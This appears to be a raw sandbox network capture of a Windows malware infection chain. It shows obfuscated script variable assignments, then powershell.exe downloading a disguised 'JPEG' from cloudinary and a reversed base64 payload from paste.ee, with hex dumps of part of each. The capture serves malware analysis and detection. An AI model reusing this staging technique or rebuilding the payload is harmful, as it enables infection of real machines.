                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 20 3d 20 22 50 68 4b 43 55 53 47 6b 4a 48 57 66 63 6a 4b 22 0d 0a 0d 0a 68 61 47 61 42 70 6e 66 57 66 63 55 6d 55 4f 20 3d 20 22 52 63 4b 55 61 70 7a 4c 57 4c 4b 5a 63 63 5a 22 0d 0a 61 68 4c 52 63 43 43 4b 70 65 4c 48 68 6f 69 20 3d 20 22 4b 6f 67 47 6b 57 65 6b 6b 4e 6b 57 5a 6b 68 22 0d 0a 6f 50 6b 6c 4c 65 78 4b 62 6b 6d 6e 68 6c 4c 20 3d 20 22 6b 65 4b 63 43 6e 55 69 4c 66 65 50 6c 4c 57 22 0d 0a 6d 6b 63 4c 55 69 4c 4a 4c 76 75 63 41 41 4c 20 3d 20 22 4f 4c 76 4e 70 62 4f 63 57 4e 57 62 61 50 57 22 0d 0a 66 55 63 6a 68 4b 68 47 55 4c 57 65 75 65 6b 20 3d 20 22 42 67 4c 69 6f 4e 6e 78 4f 55 4c 4f 4e 6f 6d 22 0d 0a 4b 68 64 47 62 61 47 69 4e 66 4a 6b 61 4c 68 20 3d 20 22 70 41 76 6a 63 76 47 57 69 65 69 4c 57 69 67 22 0d 0a 4a 69 6c 4b 52 4c 57 64 62
                                                                                                                                          Data Ascii: = "PhKCUSGkJHWfcjK"haGaBpnfWfcUmUO = "RcKUapzLWLKZccZ"ahLRcCCKpeLHhoi = "KogGkWekkNkWZkh"oPklLexKbkmnhlL = "keKcCnUiLfePlLW"mkcLUiLJLvucAAL = "OLvNpbOcWNWbaPW"fUcjhKhGULWeuek = "BgLioNnxOULONom"KhdGbaGiNfJkaLh = "pAvjcvGWieiLWig"JilKRLWdb
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 3d 20 22 4b 65 4c 4c 6b 4b 73 52 71 6b 50 4c 4c 57 4b 22 0d 0a 41 76 42 78 54 53 57 6e 6b 78 66 4c 74 4c 78 20 3d 20 22 43 50 5a 52 71 5a 57 74 57 4e 4c 4c 69 6b 52 22 0d 0a 4b 71 69 62 47 57 55 4c 6d 66 65 41 70 57 4f 20 3d 20 22 49 50 63 6f 6b 4b 61 63 4c 63 6e 42 42 6b 6c 22 0d 0a 43 4f 63 74 68 68 6c 57 49 6e 43 63 75 6e 57 20 3d 20 22 4a 49 6c 65 4b 66 4b 4c 4b 71 41 63 6e 62 66 22 0d 0a 0d 0a 4c 57 4c 66 57 6b 5a 47 61 6d 55 4c 5a 6c 4c 20 3d 20 22 55 72 69 69 47 4b 4b 6d 4b 6e 6e 61 43 71 50 22 0d 0a 55 57 62 4c 75 5a 52 63 65 74 4e 4c 57 70 54 20 3d 20 22 6f 6f 69 63 52 69 6f 4c 57 41 57 49 57 63 4c 22 0d 0a 50 6c 7a 73 50 7a 6f 50 57 49 55 57 50 69 57 20 3d 20 22 4c 6b 43 76 51 69 52 57 69 7a 69 42 49 41 57 22 0d 0a 66 69 70 52 5a 57 63 70 62 63
                                                                                                                                          Data Ascii: = "KeLLkKsRqkPLLWK"AvBxTSWnkxfLtLx = "CPZRqZWtWNLLikR"KqibGWULmfeApWO = "IPcokKacLcnBBkl"COcthhlWInCcunW = "JIleKfKLKqAcnbf"LWLfWkZGamULZlL = "UriiGKKmKnnaCqP"UWbLuZRcetNLWpT = "ooicRioLWAWIWcL"PlzsPzoPWIUWPiW = "LkCvQiRWiziBIAW"fipRZWcpbc
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 20 22 65 78 4e 55 47 49 6b 4b 5a 4c 64 42 6f 6d 7a 22 0d 0a 50 63 47 50 6a 63 6f 6e 50 4e 57 69 55 5a 6f 20 3d 20 22 47 7a 47 65 4f 57 66 50 47 74 6d 51 74 7a 4c 22 0d 0a 42 6b 57 53 57 41 71 61 61 63 7a 50 4c 47 69 20 3d 20 22 4c 78 66 57 4b 41 4c 57 42 4c 6d 75 57 74 6a 22 0d 0a 65 47 69 57 69 50 6c 65 73 68 69 71 49 4b 6e 20 3d 20 22 6d 51 41 6f 65 4c 4c 5a 61 51 47 57 63 6b 55 22 0d 0a 61 4b 4b 78 57 47 42 6d 48 41 6a 57 47 4b 4e 20 3d 20 22 4b 61 6b 42 71 61 4c 57 61 78 68 43 62 50 52 22 0d 0a 57 57 57 4b 68 69 4c 70 7a 52 4c 4b 4b 6f 4c 20 3d 20 22 57 63 4e 54 61 42 6c 4e 63 6d 47 50 61 6b 4b 22 0d 0a 6e 5a 69 57 5a 47 5a 57 6c 4c 62 55 6f 54 47 20 3d 20 22 4c 6e 57 6f 76 7a 4c 41 71 4b 62 68 66 74 4b 22 0d 0a 0d 0a 7a 69 47 65 71 69 4b 4e 4c 75 57
                                                                                                                                          Data Ascii: "exNUGIkKZLdBomz"PcGPjconPNWiUZo = "GzGeOWfPGtmQtzL"BkWSWAqaaczPLGi = "LxfWKALWBLmuWtj"eGiWiPleshiqIKn = "mQAoeLLZaQGWckU"aKKxWGBmHAjWGKN = "KakBqaLWaxhCbPR"WWWKhiLpzRLKKoL = "WcNTaBlNcmGPakK"nZiWZGZWlLbUoTG = "LnWovzLAqKbhftK"ziGeqiKNLuW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.12 | 49711 | 151.101.193.137 | 443 | 6372 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:00:20 UTC | 127 | OUT | GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
Host: res.cloudinary.com
Connection: Keep-Alive
2024-12-14 13:00:20 UTC | 803 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 2230233
Content-Type: image/jpeg
Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
Date: Sat, 14 Dec 2024 13:00:20 GMT
Strict-Transport-Security: max-age=604800
Cache-Control: public, no-transform, immutable, max-age=2592000
Server-Timing: cld-fastly;dur=187;cpu=2;start=2024-12-14T13:00:20.583Z;desc=miss,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)",cloudinary;dur=176;start=2024-12-14T13:00:20.588Z
Server: Cloudinary
Timing-Allow-Origin: *
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                                                          Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                                                          Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                                                          Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                                          Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                                          Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                                          Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                                          Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                                          Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                                          Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.12 | 49719 | 104.21.84.67 | 443 | 6372 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-14 13:00:42 UTC | 67 | OUT | GET /r/iDcBt/0 HTTP/1.1
Host: paste.ee
Connection: Keep-Alive
2024-12-14 13:00:42 UTC | 1286 | IN | HTTP/1.1 200 OK
Date: Sat, 14 Dec 2024 13:00:42 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
CF-Cache-Status: HIT
Age: 57143
Last-Modified: Fri, 13 Dec 2024 21:08:19 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B05Se2fLFIVa9C5jA4sFrFbxH7AS%2FAKPFjrxZlhQMwGEYuyK0dtuCf23sODaCZvNbm%2FXmIbbhbj6YJA5tkCP0jIN5ownEC8opASdyn8WmpT4MhTdGn68QuR0Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f1e60ded817726e-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-12-14 13:00:42 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 39 37 39 26 6d 69 6e 5f 72 74 74 3d 31 39 37 33 26 72 74 74 5f 76 61 72 3d 37 35 32 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 37 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 34 34 38 32 39 26 63 77 6e 64 3d 32 32 34 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 38 31 33 38 64 65 30 61 34 64 36 65 36 65 38 64 26 74 73 3d 35 35 33 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                                          Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1973&rtt_var=752&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=681&delivery_rate=1444829&cwnd=224&unsent_bytes=0&cid=8138de0a4d6e6e8d&ts=553&x=0"
                                                                                                                                          2024-12-14 13:00:42 UTC1237INData Raw: 37 61 39 34 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                                                                                                          Data Ascii: 7a94AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 50 34 67 44 4f 6f 67 44 4a 34 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41
                                                                                                                                          Data Ascii: P4gDOogDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGA
                                                                                                                                          2024-12-14 13:00:42 UTC1369INData Raw: 36 51 74 4f 4d 72 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44
                                                                                                                                          Data Ascii: 6QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD
